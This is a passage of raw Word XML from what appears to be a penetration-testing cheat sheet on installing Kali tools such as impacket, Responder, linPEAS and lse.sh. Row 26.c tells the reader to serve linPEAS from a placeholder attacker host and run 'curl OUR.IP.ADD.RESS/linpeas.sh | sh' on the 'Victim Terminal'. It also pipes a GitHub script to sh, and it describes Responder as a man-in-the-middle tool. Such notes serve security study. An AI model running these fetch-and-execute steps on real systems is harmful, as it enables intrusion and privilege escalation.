                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidR="00BF193F" w:rsidRPr="00BF193F">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> python3 </w:t>
            </w:r>
            <w:r w:rsidR="00BF193F" w:rsidRPr="00BF193F">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">/opt/impacket/setup.py </w:t>
            </w:r>
            <w:r w:rsidR="00BF193F" w:rsidRPr="00BF193F">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>install</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00754958" w14:paraId="47832B2D" w14:textId="77777777" w:rsidTr="00045F23">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="594" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="72B4C892" w14:textId="77777777" w:rsidR="00754958" w:rsidRDefault="00754958" w:rsidP="00045F23">
            <w:r>
              <w:t>25.e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2396" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1C7F8E44" w14:textId="77777777" w:rsidR="00754958" w:rsidRDefault="00754958" w:rsidP="00045F23">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>locate</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00690494">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(as mentioned in 1.cc)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8037" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="648178AE" w14:textId="77777777" w:rsidR="00754958" w:rsidRPr="000D454E" w:rsidRDefault="00754958" w:rsidP="00045F23">
            <w:r w:rsidRPr="000D454E">
              <w:t>Don’t forget to update the locate database by using:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55FF8AF8" w14:textId="77777777" w:rsidR="00754958" w:rsidRDefault="00754958" w:rsidP="00045F23">
            <w:r w:rsidRPr="000D454E">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005933F6">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="005933F6">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="000D454E">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>updatedb</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F3EDB" w14:paraId="09EACF2F" w14:textId="77777777" w:rsidTr="00045F23">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="594" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="38FE79BA" w14:textId="4AEF8DB8" w:rsidR="003F3EDB" w:rsidRDefault="003F3EDB" w:rsidP="00045F23">
            <w:r>
              <w:t>25.f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2396" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="15909AA2" w14:textId="39E82184" w:rsidR="003F3EDB" w:rsidRDefault="003F3EDB" w:rsidP="00045F23">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>responder</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(Remember, responder is not installed by default on Kali)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8037" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="70A65698" w14:textId="77777777" w:rsidR="003F3EDB" w:rsidRDefault="003F3EDB" w:rsidP="00045F23">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>To install, quite simply use apt:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003F3EDB">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="003F3EDB">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt </w:t>
            </w:r>
            <w:r w:rsidRPr="003F3EDB">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">install </w:t>
            </w:r>
            <w:r w:rsidRPr="003F3EDB">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>responder</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6788E5F5" w14:textId="2C4BDEF8" w:rsidR="008233DA" w:rsidRPr="000D454E" w:rsidRDefault="008233DA" w:rsidP="00045F23">
            <w:r w:rsidRPr="0031499A">
              <w:t>Note that Responder only works when acting as a man in the middle type of attack where your device using Responder must be on the internal network o</w:t>
            </w:r>
            <w:r w:rsidR="0031499A" w:rsidRPr="0031499A">
              <w:t>f which you wish to target.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00754958" w14:paraId="340453CD" w14:textId="77777777" w:rsidTr="00045F23">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="594" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="0E1C4A72" w14:textId="77777777" w:rsidR="00754958" w:rsidRDefault="00754958" w:rsidP="00045F23"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2396" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="6E60BCDF" w14:textId="77777777" w:rsidR="00754958" w:rsidRDefault="00754958" w:rsidP="00045F23">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8037" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="103A9F77" w14:textId="77777777" w:rsidR="00754958" w:rsidRDefault="00754958" w:rsidP="00045F23"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="75313325" w14:textId="76F5A6A1" w:rsidR="00B9184F" w:rsidRDefault="00B9184F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1430AC50" w14:textId="77777777" w:rsidR="00BE4C27" w:rsidRDefault="00BE4C27">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Hlk76397058"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="718996D0" w14:textId="27C216D3" w:rsidR="00BE4C27" w:rsidRDefault="00BE4C27" w:rsidP="00BE4C27">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Installing: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>linPEAS</w:t>
      </w:r>
      <w:r w:rsidR="007F4AA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> | lse.sh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (GitHub Repository)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="1098"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="611"/>
        <w:gridCol w:w="2392"/>
        <w:gridCol w:w="8024"/>
      </w:tblGrid>
      <w:tr w:rsidR="009A00A6" w14:paraId="74B28D11" w14:textId="77777777" w:rsidTr="00BE4C27">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="466B9B61" w14:textId="22DFD68D" w:rsidR="009A00A6" w:rsidRDefault="009A00A6" w:rsidP="00FC5A3D">
            <w:r>
              <w:t>26.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2934AEC8" w14:textId="68009B3A" w:rsidR="009A00A6" w:rsidRDefault="009A00A6" w:rsidP="00FC5A3D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>linpeas</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:br/>
              <w:t>(linpeas is not saved by default on Kali)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="002175A9">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(See 76 for more info)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="59579EA9" w14:textId="77777777" w:rsidR="009A00A6" w:rsidRPr="00D2375C" w:rsidRDefault="009A00A6" w:rsidP="002175A9">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D2375C">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>ONCE IN A</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t xml:space="preserve"> LINUX</w:t>
            </w:r>
            <w:r w:rsidRPr="00D2375C">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t xml:space="preserve"> SYSTEM, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>LINPEAS IS A SCRIPT WHICH CAN FIND PRIVILEGE ESCALATION VULNERABILITIES ON THE HOST MACHINE.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00F72DF2">
              <w:t>This script will work on Linux/Unix and Mac operating systems, there is a winPEAS version available for Windows systems.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:br/>
            </w:r>
          </w:p>
          <w:p w14:paraId="647EEF63" w14:textId="116EAE10" w:rsidR="009A00A6" w:rsidRDefault="009A00A6" w:rsidP="002175A9">
            <w:r>
              <w:t>To use this script, first you will need to have a shell open in the target system.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A00A6" w14:paraId="43CBB1C9" w14:textId="77777777" w:rsidTr="00BE4C27">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="00DAB8CB" w14:textId="4DDF5290" w:rsidR="009A00A6" w:rsidRDefault="009A00A6" w:rsidP="00FC5A3D">
            <w:r>
              <w:t>26.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="61F001B6" w14:textId="77777777" w:rsidR="009A00A6" w:rsidRDefault="009A00A6" w:rsidP="00FC5A3D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4F7E8546" w14:textId="451D6D60" w:rsidR="009A00A6" w:rsidRPr="000004AC" w:rsidRDefault="009A00A6" w:rsidP="00FC5A3D">
            <w:r w:rsidRPr="002175A9">
              <w:t xml:space="preserve">The script can be </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="002175A9">
              <w:t>ran</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="002175A9">
              <w:t xml:space="preserve"> using</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> /bin/sh by using</w:t>
            </w:r>
            <w:r w:rsidRPr="002175A9">
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002175A9">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">curl </w:t>
            </w:r>
            <w:r w:rsidR="00887AD2" w:rsidRPr="00887AD2">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>https://raw.githubusercontent.com/carlospolop/privilege-escalation-</w:t>
            </w:r>
            <w:r w:rsidR="00887AD2">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002175A9">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>awesome-scripts-suite/master/linPEAS/linpeas.sh</w:t>
            </w:r>
            <w:r w:rsidRPr="002175A9">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> | </w:t>
            </w:r>
            <w:r w:rsidRPr="009A00A6">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>sh</w:t>
            </w:r>
            <w:r w:rsidRPr="002175A9">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00887AD2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
              </w:rPr>
              <w:t>(All one command)</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>Alternatively, the script can be saved locally onto your machine using:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="000004AC">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">curl </w:t>
            </w:r>
            <w:r w:rsidR="00887AD2" w:rsidRPr="00887AD2">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>https://raw.githubusercontent.com/carlospolop/PEASS-</w:t>
            </w:r>
            <w:r w:rsidR="00887AD2">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="000004AC">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>ng/master/linPEAS/linpeas.sh</w:t>
            </w:r>
            <w:r w:rsidRPr="000004AC">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00887AD2">
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t>linpeas.sh</w:t>
            </w:r>
            <w:r w:rsidR="00887AD2">
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00887AD2">
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00887AD2" w:rsidRPr="00887AD2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
              </w:rPr>
              <w:t>(All one command)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:t>This will save the script into a file called ‘</w:t>
            </w:r>
            <w:r w:rsidRPr="006357DB">
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t>linpeas.sh</w:t>
            </w:r>
            <w:r>
              <w:t>’ in the current working directory.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A00A6" w14:paraId="14DA2B89" w14:textId="77777777" w:rsidTr="00BE4C27">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="782A04DB" w14:textId="4500ADC5" w:rsidR="009A00A6" w:rsidRDefault="009A00A6" w:rsidP="00FC5A3D">
            <w:r>
              <w:t>26.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="7F0948AE" w14:textId="77777777" w:rsidR="009A00A6" w:rsidRDefault="009A00A6" w:rsidP="00FC5A3D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="149861CD" w14:textId="064F0A17" w:rsidR="009A00A6" w:rsidRDefault="009A00A6" w:rsidP="009A00A6">
            <w:r>
              <w:t xml:space="preserve">In addition, once access has been gained into a target system, </w:t>
            </w:r>
            <w:r w:rsidR="006357DB">
              <w:t>a python module</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> can upload and run the script for you</w:t>
            </w:r>
            <w:r w:rsidR="006357DB">
              <w:t xml:space="preserve"> (SimpleHTTPServer)</w:t>
            </w:r>
            <w:r>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009A00A6">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="009A00A6">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> python </w:t>
            </w:r>
            <w:r w:rsidRPr="009A00A6">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-m</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009A00A6">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>SimpleHTTPServer</w:t>
            </w:r>
            <w:r w:rsidRPr="00F5525E">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> 80</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F5525E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
              </w:rPr>
              <w:t>#Host Terminal</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2236369F" w14:textId="0D7B24C1" w:rsidR="009A00A6" w:rsidRPr="002175A9" w:rsidRDefault="009A00A6" w:rsidP="009A00A6">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009A00A6">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">curl </w:t>
            </w:r>
            <w:r w:rsidR="006357DB" w:rsidRPr="006357DB">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>OUR.IP.ADD.RESS</w:t>
            </w:r>
            <w:r w:rsidRPr="009A00A6">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="006357DB">
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t xml:space="preserve">linpeas.sh </w:t>
            </w:r>
            <w:r w:rsidRPr="009A00A6">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>|</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009A00A6">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">sh </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F5525E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
              </w:rPr>
              <w:t>#Victim Terminal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F4AA8" w14:paraId="2514F74C" w14:textId="77777777" w:rsidTr="00BE4C27">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="2A7AEB58" w14:textId="667D9E38" w:rsidR="007F4AA8" w:rsidRDefault="007F4AA8" w:rsidP="00FC5A3D">
            <w:r>
              <w:t>26.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="70B27618" w14:textId="77777777" w:rsidR="007F4AA8" w:rsidRDefault="007F4AA8" w:rsidP="00FC5A3D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>lse.sh</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0ED68E18" w14:textId="77777777" w:rsidR="007F4AA8" w:rsidRDefault="007F4AA8" w:rsidP="00FC5A3D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(l</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">se.sh </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>is not saved by default on Kali)</w:t>
            </w:r>
          </w:p>
